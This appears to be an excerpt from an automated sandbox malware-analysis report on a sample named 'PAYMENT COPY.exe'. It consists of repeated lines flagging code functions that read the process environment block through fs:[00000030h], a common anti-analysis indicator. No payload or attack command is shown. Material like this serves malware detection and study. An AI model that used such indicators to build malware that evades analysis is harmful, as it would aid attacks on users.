          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AEB02A mov eax, dword ptr fs:[00000030h]2_2_00AEB02A
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AEB02A mov eax, dword ptr fs:[00000030h]2_2_00AEB02A
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B0002D mov eax, dword ptr fs:[00000030h]2_2_00B0002D
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B0002D mov eax, dword ptr fs:[00000030h]2_2_00B0002D
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B0002D mov eax, dword ptr fs:[00000030h]2_2_00B0002D
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B0002D mov eax, dword ptr fs:[00000030h]2_2_00B0002D
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B0002D mov eax, dword ptr fs:[00000030h]2_2_00B0002D
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B57016 mov eax, dword ptr fs:[00000030h]2_2_00B57016
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B57016 mov eax, dword ptr fs:[00000030h]2_2_00B57016
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B57016 mov eax, dword ptr fs:[00000030h]2_2_00B57016
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA4015 mov eax, dword ptr fs:[00000030h]2_2_00BA4015
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA4015 mov eax, dword ptr fs:[00000030h]2_2_00BA4015
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B92073 mov eax, dword ptr fs:[00000030h]2_2_00B92073
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA1074 mov eax, dword ptr fs:[00000030h]2_2_00BA1074
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AF0050 mov eax, dword ptr fs:[00000030h]2_2_00AF0050
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AF0050 mov eax, dword ptr fs:[00000030h]2_2_00AF0050
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B551BE mov eax, dword ptr fs:[00000030h]2_2_00B551BE
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B551BE mov eax, dword ptr fs:[00000030h]2_2_00B551BE
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B551BE mov eax, dword ptr fs:[00000030h]2_2_00B551BE
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B551BE mov eax, dword ptr fs:[00000030h]2_2_00B551BE
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B061A0 mov eax, dword ptr fs:[00000030h]2_2_00B061A0
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B061A0 mov eax, dword ptr fs:[00000030h]2_2_00B061A0
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B569A6 mov eax, dword ptr fs:[00000030h]2_2_00B569A6
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B02990 mov eax, dword ptr fs:[00000030h]2_2_00B02990
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AFC182 mov eax, dword ptr fs:[00000030h]2_2_00AFC182
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B0A185 mov eax, dword ptr fs:[00000030h]2_2_00B0A185
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00ADB1E1 mov eax, dword ptr fs:[00000030h]2_2_00ADB1E1
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00ADB1E1 mov eax, dword ptr fs:[00000030h]2_2_00ADB1E1
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00ADB1E1 mov eax, dword ptr fs:[00000030h]2_2_00ADB1E1
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B641E8 mov eax, dword ptr fs:[00000030h]2_2_00B641E8
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B0513A mov eax, dword ptr fs:[00000030h]2_2_00B0513A
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B0513A mov eax, dword ptr fs:[00000030h]2_2_00B0513A
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AF4120 mov eax, dword ptr fs:[00000030h]2_2_00AF4120
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AF4120 mov eax, dword ptr fs:[00000030h]2_2_00AF4120
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AF4120 mov eax, dword ptr fs:[00000030h]2_2_00AF4120
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AF4120 mov eax, dword ptr fs:[00000030h]2_2_00AF4120
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AF4120 mov ecx, dword ptr fs:[00000030h]2_2_00AF4120
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AD9100 mov eax, dword ptr fs:[00000030h]2_2_00AD9100
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AD9100 mov eax, dword ptr fs:[00000030h]2_2_00AD9100
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AD9100 mov eax, dword ptr fs:[00000030h]2_2_00AD9100
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00ADC962 mov eax, dword ptr fs:[00000030h]2_2_00ADC962
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00ADB171 mov eax, dword ptr fs:[00000030h]2_2_00ADB171
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00ADB171 mov eax, dword ptr fs:[00000030h]2_2_00ADB171
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AFB944 mov eax, dword ptr fs:[00000030h]2_2_00AFB944
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AFB944 mov eax, dword ptr fs:[00000030h]2_2_00AFB944
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B0FAB0 mov eax, dword ptr fs:[00000030h]2_2_00B0FAB0
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AD52A5 mov eax, dword ptr fs:[00000030h]2_2_00AD52A5
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AD52A5 mov eax, dword ptr fs:[00000030h]2_2_00AD52A5
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AD52A5 mov eax, dword ptr fs:[00000030h]2_2_00AD52A5
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AD52A5 mov eax, dword ptr fs:[00000030h]2_2_00AD52A5
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AD52A5 mov eax, dword ptr fs:[00000030h]2_2_00AD52A5
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AEAAB0 mov eax, dword ptr fs:[00000030h]2_2_00AEAAB0
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AEAAB0 mov eax, dword ptr fs:[00000030h]2_2_00AEAAB0
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B0D294 mov eax, dword ptr fs:[00000030h]2_2_00B0D294
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B0D294 mov eax, dword ptr fs:[00000030h]2_2_00B0D294
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B02AE4 mov eax, dword ptr fs:[00000030h]2_2_00B02AE4
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B02ACB mov eax, dword ptr fs:[00000030h]2_2_00B02ACB
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B14A2C mov eax, dword ptr fs:[00000030h]2_2_00B14A2C
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B14A2C mov eax, dword ptr fs:[00000030h]2_2_00B14A2C
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE8A0A mov eax, dword ptr fs:[00000030h]2_2_00AE8A0A
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AF3A1C mov eax, dword ptr fs:[00000030h]2_2_00AF3A1C
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00ADAA16 mov eax, dword ptr fs:[00000030h]2_2_00ADAA16
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00ADAA16 mov eax, dword ptr fs:[00000030h]2_2_00ADAA16
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AD5210 mov eax, dword ptr fs:[00000030h]2_2_00AD5210
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AD5210 mov ecx, dword ptr fs:[00000030h]2_2_00AD5210
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AD5210 mov eax, dword ptr fs:[00000030h]2_2_00AD5210
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AD5210 mov eax, dword ptr fs:[00000030h]2_2_00AD5210
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B1927A mov eax, dword ptr fs:[00000030h]2_2_00B1927A
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B8B260 mov eax, dword ptr fs:[00000030h]2_2_00B8B260
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B8B260 mov eax, dword ptr fs:[00000030h]2_2_00B8B260
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA8A62 mov eax, dword ptr fs:[00000030h]2_2_00BA8A62
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B64257 mov eax, dword ptr fs:[00000030h]2_2_00B64257
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B9EA55 mov eax, dword ptr fs:[00000030h]2_2_00B9EA55
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AD9240 mov eax, dword ptr fs:[00000030h]2_2_00AD9240
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AD9240 mov eax, dword ptr fs:[00000030h]2_2_00AD9240
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AD9240 mov eax, dword ptr fs:[00000030h]2_2_00AD9240
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AD9240 mov eax, dword ptr fs:[00000030h]2_2_00AD9240
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B04BAD mov eax, dword ptr fs:[00000030h]2_2_00B04BAD
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B04BAD mov eax, dword ptr fs:[00000030h]2_2_00B04BAD
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B04BAD mov eax, dword ptr fs:[00000030h]2_2_00B04BAD
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA5BA5 mov eax, dword ptr fs:[00000030h]2_2_00BA5BA5
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B0B390 mov eax, dword ptr fs:[00000030h]2_2_00B0B390
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE1B8F mov eax, dword ptr fs:[00000030h]2_2_00AE1B8F
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE1B8F mov eax, dword ptr fs:[00000030h]2_2_00AE1B8F
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B02397 mov eax, dword ptr fs:[00000030h]2_2_00B02397
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B9138A mov eax, dword ptr fs:[00000030h]2_2_00B9138A
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B8D380 mov ecx, dword ptr fs:[00000030h]2_2_00B8D380
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AFDBE9 mov eax, dword ptr fs:[00000030h]2_2_00AFDBE9
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B003E2 mov eax, dword ptr fs:[00000030h]2_2_00B003E2
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B003E2 mov eax, dword ptr fs:[00000030h]2_2_00B003E2
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B003E2 mov eax, dword ptr fs:[00000030h]2_2_00B003E2
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B003E2 mov eax, dword ptr fs:[00000030h]2_2_00B003E2
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B003E2 mov eax, dword ptr fs:[00000030h]2_2_00B003E2
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B003E2 mov eax, dword ptr fs:[00000030h]2_2_00B003E2
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B553CA mov eax, dword ptr fs:[00000030h]2_2_00B553CA
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B553CA mov eax, dword ptr fs:[00000030h]2_2_00B553CA
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B9131B mov eax, dword ptr fs:[00000030h]2_2_00B9131B
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B03B7A mov eax, dword ptr fs:[00000030h]2_2_00B03B7A
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B03B7A mov eax, dword ptr fs:[00000030h]2_2_00B03B7A
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00ADDB60 mov ecx, dword ptr fs:[00000030h]2_2_00ADDB60
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA8B58 mov eax, dword ptr fs:[00000030h]2_2_00BA8B58
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00ADDB40 mov eax, dword ptr fs:[00000030h]2_2_00ADDB40
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00ADF358 mov eax, dword ptr fs:[00000030h]2_2_00ADF358
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE849B mov eax, dword ptr fs:[00000030h]2_2_00AE849B
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B914FB mov eax, dword ptr fs:[00000030h]2_2_00B914FB
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B56CF0 mov eax, dword ptr fs:[00000030h]2_2_00B56CF0
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B56CF0 mov eax, dword ptr fs:[00000030h]2_2_00B56CF0
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B56CF0 mov eax, dword ptr fs:[00000030h]2_2_00B56CF0
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA8CD6 mov eax, dword ptr fs:[00000030h]2_2_00BA8CD6
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B0BC2C mov eax, dword ptr fs:[00000030h]2_2_00B0BC2C
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA740D mov eax, dword ptr fs:[00000030h]2_2_00BA740D
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA740D mov eax, dword ptr fs:[00000030h]2_2_00BA740D
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA740D mov eax, dword ptr fs:[00000030h]2_2_00BA740D
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]2_2_00B91C06
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]2_2_00B91C06
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]2_2_00B91C06
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]2_2_00B91C06
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]2_2_00B91C06
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]2_2_00B91C06
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]2_2_00B91C06
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]2_2_00B91C06
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]2_2_00B91C06
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]2_2_00B91C06
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]2_2_00B91C06
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]2_2_00B91C06
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]2_2_00B91C06
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]2_2_00B91C06
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B56C0A mov eax, dword ptr fs:[00000030h]2_2_00B56C0A
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B56C0A mov eax, dword ptr fs:[00000030h]2_2_00B56C0A
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B56C0A mov eax, dword ptr fs:[00000030h]2_2_00B56C0A
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B56C0A mov eax, dword ptr fs:[00000030h]2_2_00B56C0A
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AF746D mov eax, dword ptr fs:[00000030h]2_2_00AF746D
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B6C450 mov eax, dword ptr fs:[00000030h]2_2_00B6C450
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B6C450 mov eax, dword ptr fs:[00000030h]2_2_00B6C450
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B0A44B mov eax, dword ptr fs:[00000030h]2_2_00B0A44B
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B01DB5 mov eax, dword ptr fs:[00000030h]2_2_00B01DB5
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B01DB5 mov eax, dword ptr fs:[00000030h]2_2_00B01DB5
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B01DB5 mov eax, dword ptr fs:[00000030h]2_2_00B01DB5
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B035A1 mov eax, dword ptr fs:[00000030h]2_2_00B035A1
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA05AC mov eax, dword ptr fs:[00000030h]2_2_00BA05AC
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA05AC mov eax, dword ptr fs:[00000030h]2_2_00BA05AC
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AD2D8A mov eax, dword ptr fs:[00000030h]2_2_00AD2D8A
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AD2D8A mov eax, dword ptr fs:[00000030h]2_2_00AD2D8A
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AD2D8A mov eax, dword ptr fs:[00000030h]2_2_00AD2D8A
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AD2D8A mov eax, dword ptr fs:[00000030h]2_2_00AD2D8A
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AD2D8A mov eax, dword ptr fs:[00000030h]2_2_00AD2D8A
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B0FD9B mov eax, dword ptr fs:[00000030h]2_2_00B0FD9B
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B0FD9B mov eax, dword ptr fs:[00000030h]2_2_00B0FD9B
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B02581 mov eax, dword ptr fs:[00000030h]2_2_00B02581
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B02581 mov eax, dword ptr fs:[00000030h]2_2_00B02581
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B02581 mov eax, dword ptr fs:[00000030h]2_2_00B02581
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B02581 mov eax, dword ptr fs:[00000030h]2_2_00B02581
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B88DF1 mov eax, dword ptr fs:[00000030h]2_2_00B88DF1
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AED5E0 mov eax, dword ptr fs:[00000030h]2_2_00AED5E0
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AED5E0 mov eax, dword ptr fs:[00000030h]2_2_00AED5E0
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B9FDE2 mov eax, dword ptr fs:[00000030h]2_2_00B9FDE2
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B9FDE2 mov eax, dword ptr fs:[00000030h]2_2_00B9FDE2
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B9FDE2 mov eax, dword ptr fs:[00000030h]2_2_00B9FDE2
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B9FDE2 mov eax, dword ptr fs:[00000030h]2_2_00B9FDE2
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B56DC9 mov eax, dword ptr fs:[00000030h]2_2_00B56DC9
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B56DC9 mov eax, dword ptr fs:[00000030h]2_2_00B56DC9
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B56DC9 mov eax, dword ptr fs:[00000030h]2_2_00B56DC9
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B56DC9 mov ecx, dword ptr fs:[00000030h]2_2_00B56DC9
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B56DC9 mov eax, dword ptr fs:[00000030h]2_2_00B56DC9
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B56DC9 mov eax, dword ptr fs:[00000030h]2_2_00B56DC9
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B9E539 mov eax, dword ptr fs:[00000030h]2_2_00B9E539
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B5A537 mov eax, dword ptr fs:[00000030h]2_2_00B5A537
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B04D3B mov eax, dword ptr fs:[00000030h]2_2_00B04D3B
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B04D3B mov eax, dword ptr fs:[00000030h]2_2_00B04D3B
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B04D3B mov eax, dword ptr fs:[00000030h]2_2_00B04D3B
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA8D34 mov eax, dword ptr fs:[00000030h]2_2_00BA8D34
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]2_2_00AE3D34
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]2_2_00AE3D34
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]2_2_00AE3D34
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]2_2_00AE3D34
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]2_2_00AE3D34
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]2_2_00AE3D34
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]2_2_00AE3D34
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]2_2_00AE3D34
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]2_2_00AE3D34
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]2_2_00AE3D34
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]2_2_00AE3D34
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]2_2_00AE3D34
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]2_2_00AE3D34
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00ADAD30 mov eax, dword ptr fs:[00000030h]2_2_00ADAD30
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AFC577 mov eax, dword ptr fs:[00000030h]2_2_00AFC577
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AFC577 mov eax, dword ptr fs:[00000030h]2_2_00AFC577
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B13D43 mov eax, dword ptr fs:[00000030h]2_2_00B13D43
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B53540 mov eax, dword ptr fs:[00000030h]2_2_00B53540
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AF7D50 mov eax, dword ptr fs:[00000030h]2_2_00AF7D50
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B546A7 mov eax, dword ptr fs:[00000030h]2_2_00B546A7
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA0EA5 mov eax, dword ptr fs:[00000030h]2_2_00BA0EA5
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA0EA5 mov eax, dword ptr fs:[00000030h]2_2_00BA0EA5
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA0EA5 mov eax, dword ptr fs:[00000030h]2_2_00BA0EA5
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B6FE87 mov eax, dword ptr fs:[00000030h]2_2_00B6FE87
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE76E2 mov eax, dword ptr fs:[00000030h]2_2_00AE76E2
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B016E0 mov ecx, dword ptr fs:[00000030h]2_2_00B016E0
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA8ED6 mov eax, dword ptr fs:[00000030h]2_2_00BA8ED6
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B18EC7 mov eax, dword ptr fs:[00000030h]2_2_00B18EC7
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B8FEC0 mov eax, dword ptr fs:[00000030h]2_2_00B8FEC0
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B036CC mov eax, dword ptr fs:[00000030h]2_2_00B036CC
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B8FE3F mov eax, dword ptr fs:[00000030h]2_2_00B8FE3F
